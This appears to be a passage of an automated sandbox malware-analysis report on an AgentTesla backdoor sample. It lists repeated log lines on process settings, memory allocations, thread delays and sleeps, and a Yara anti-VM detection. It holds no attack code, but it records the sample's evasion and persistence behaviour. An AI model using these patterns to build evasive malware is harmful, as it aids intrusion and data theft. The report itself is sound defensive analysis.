Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: Process Memory Space: SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe PID: 1444, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: xRAvleeiuDbJ.exe PID: 7088, type: MEMORYSTR

Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Memory allocated: D40000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Memory allocated: 2950000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Memory allocated: 4950000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Memory allocated: 7A00000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Memory allocated: 6EA0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Memory allocated: 8A00000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Memory allocated: 9A00000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Memory allocated: E10000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Memory allocated: 2840000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Memory allocated: 4840000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Memory allocated: 15C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Memory allocated: 2FB0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Memory allocated: 2DE0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Memory allocated: 7A30000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Memory allocated: 8A30000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Memory allocated: 8BD0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Memory allocated: 9BD0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Memory allocated: F20000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Memory allocated: 2CE0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Memory allocated: 4CE0000 memory reserve \| memory write watch

Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Thread delayed: delay time: 599765	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Thread delayed: delay time: 599656	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Thread delayed: delay time: 599547	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Thread delayed: delay time: 599437	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Thread delayed: delay time: 599328	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Thread delayed: delay time: 599218	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Thread delayed: delay time: 599109	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Thread delayed: delay time: 598999	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Thread delayed: delay time: 598889	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Thread delayed: delay time: 598781	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Thread delayed: delay time: 598672	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Thread delayed: delay time: 598547	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Thread delayed: delay time: 598437	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Thread delayed: delay time: 598328	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Thread delayed: delay time: 598218	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Thread delayed: delay time: 598070	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Thread delayed: delay time: 597800	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Thread delayed: delay time: 597671	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Thread delayed: delay time: 597562	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Thread delayed: delay time: 597453	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Thread delayed: delay time: 597343	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Thread delayed: delay time: 597234	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Thread delayed: delay time: 597125	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Thread delayed: delay time: 597015	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Thread delayed: delay time: 596905	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Thread delayed: delay time: 596796	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Thread delayed: delay time: 596687	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Thread delayed: delay time: 596578	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Thread delayed: delay time: 596468	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Thread delayed: delay time: 596358	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Thread delayed: delay time: 596250	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Thread delayed: delay time: 596140	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Thread delayed: delay time: 596031	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Thread delayed: delay time: 595922	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Thread delayed: delay time: 595812	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Thread delayed: delay time: 595703	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Thread delayed: delay time: 595593	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Thread delayed: delay time: 595483	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Thread delayed: delay time: 595357	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Thread delayed: delay time: 595187	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Thread delayed: delay time: 595059	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Thread delayed: delay time: 594953	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Thread delayed: delay time: 594843	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Thread delayed: delay time: 594734	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Thread delayed: delay time: 594625	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Thread delayed: delay time: 594515	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Thread delayed: delay time: 594404	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Thread delayed: delay time: 594296	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Thread delayed: delay time: 594187	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Thread delayed: delay time: 594077	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Thread delayed: delay time: 599889
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Thread delayed: delay time: 599781
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Thread delayed: delay time: 599672
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Thread delayed: delay time: 599546
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Thread delayed: delay time: 599437
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Thread delayed: delay time: 599084
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Thread delayed: delay time: 598953
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Thread delayed: delay time: 598843
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Thread delayed: delay time: 598734
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Thread delayed: delay time: 598623
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Thread delayed: delay time: 598513
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Thread delayed: delay time: 598405
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Thread delayed: delay time: 598296
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Thread delayed: delay time: 598186
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Thread delayed: delay time: 598077
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Thread delayed: delay time: 597967
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Thread delayed: delay time: 597856
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Thread delayed: delay time: 597749
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Thread delayed: delay time: 597640
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Thread delayed: delay time: 597530
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Thread delayed: delay time: 597422
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Thread delayed: delay time: 597312
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Thread delayed: delay time: 597203
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Thread delayed: delay time: 597093
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Thread delayed: delay time: 596984
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Thread delayed: delay time: 596875
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Thread delayed: delay time: 596765
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Thread delayed: delay time: 596656
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Thread delayed: delay time: 596547
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Thread delayed: delay time: 596422
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Thread delayed: delay time: 596312
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Thread delayed: delay time: 596203
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Thread delayed: delay time: 596094
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Thread delayed: delay time: 595969
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Thread delayed: delay time: 595859
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Thread delayed: delay time: 595750
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Thread delayed: delay time: 595639
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Thread delayed: delay time: 595531
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Thread delayed: delay time: 595420
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Thread delayed: delay time: 595312
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Thread delayed: delay time: 595203
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Thread delayed: delay time: 595093
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Thread delayed: delay time: 594984
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Thread delayed: delay time: 594875
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Thread delayed: delay time: 594764
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Thread delayed: delay time: 594656
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Thread delayed: delay time: 594546
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Thread delayed: delay time: 594436
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Thread delayed: delay time: 594328

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6883	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1424	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6431	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1337	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Window / User API: threadDelayed 3408	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Window / User API: threadDelayed 6438	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Window / User API: threadDelayed 3474
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Window / User API: threadDelayed 6364

Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe TID: 4608	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4032	Thread sleep count: 6883 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5976	Thread sleep time: -6456360425798339s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2356	Thread sleep count: 1424 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1548	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5704	Thread sleep time: -7378697629483816s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1372	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe TID: 3200	Thread sleep count: 38 > 30	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe TID: 3200	Thread sleep time: -35048813740048126s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe TID: 3200	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe TID: 3280	Thread sleep count: 3408 > 30	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe TID: 3200	Thread sleep time: -599875s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe TID: 3200	Thread sleep time: -599765s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe TID: 3280	Thread sleep count: 6438 > 30	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe TID: 3200	Thread sleep time: -599656s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe TID: 3200	Thread sleep time: -599547s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe TID: 3200	Thread sleep time: -599437s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe TID: 3200	Thread sleep time: -599328s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe TID: 3200	Thread sleep time: -599218s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe TID: 3200	Thread sleep time: -599109s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe TID: 3200	Thread sleep time: -598999s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe TID: 3200	Thread sleep time: -598889s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe TID: 3200	Thread sleep time: -598781s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe TID: 3200	Thread sleep time: -598672s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe TID: 3200	Thread sleep time: -598547s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe TID: 3200	Thread sleep time: -598437s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe TID: 3200	Thread sleep time: -598328s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe TID: 3200	Thread sleep time: -598218s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe TID: 3200	Thread sleep time: -598070s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe TID: 3200	Thread sleep time: -597800s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe TID: 3200	Thread sleep time: -597671s >= -30000s	Jump to behavior
